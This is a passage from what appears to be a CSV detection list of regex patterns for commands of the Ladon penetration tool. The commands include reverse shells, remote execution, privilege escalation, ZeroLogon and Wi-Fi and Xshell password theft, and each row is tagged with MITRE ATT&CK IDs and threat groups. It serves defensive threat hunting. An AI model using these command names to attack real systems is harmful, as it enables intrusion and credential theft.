APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon ReverseHttps*",".{0,1000}Ladon\sReverseHttps.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon ReverseTcp *",".{0,1000}Ladon\sReverseTcp\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon RevShell-*",".{0,1000}Ladon\sRevShell\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon Runas*",".{0,1000}Ladon\sRunas.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon RunPS *",".{0,1000}Ladon\sRunPS\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon sc *",".{0,1000}Ladon\ssc\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon SetSignAuth*",".{0,1000}Ladon\sSetSignAuth.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon SmbExec *",".{0,1000}Ladon\sSmbExec\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon Sniffer*",".{0,1000}Ladon\sSniffer.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon SshExec *",".{0,1000}Ladon\sSshExec\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon SweetPotato*",".{0,1000}Ladon\sSweetPotato.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon TcpServer *",".{0,1000}Ladon\sTcpServer\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon UdpServer*",".{0,1000}Ladon\sUdpServer.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon WebShell*",".{0,1000}Ladon\sWebShell.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon whoami*",".{0,1000}Ladon\swhoami.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon WifiPwd*",".{0,1000}Ladon\sWifiPwd.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon wmiexec*",".{0,1000}Ladon\swmiexec.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon WmiExec2 *",".{0,1000}Ladon\sWmiExec2\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon XshellPwd*",".{0,1000}Ladon\sXshellPwd.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon ZeroLogon*",".{0,1000}Ladon\sZeroLogon.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
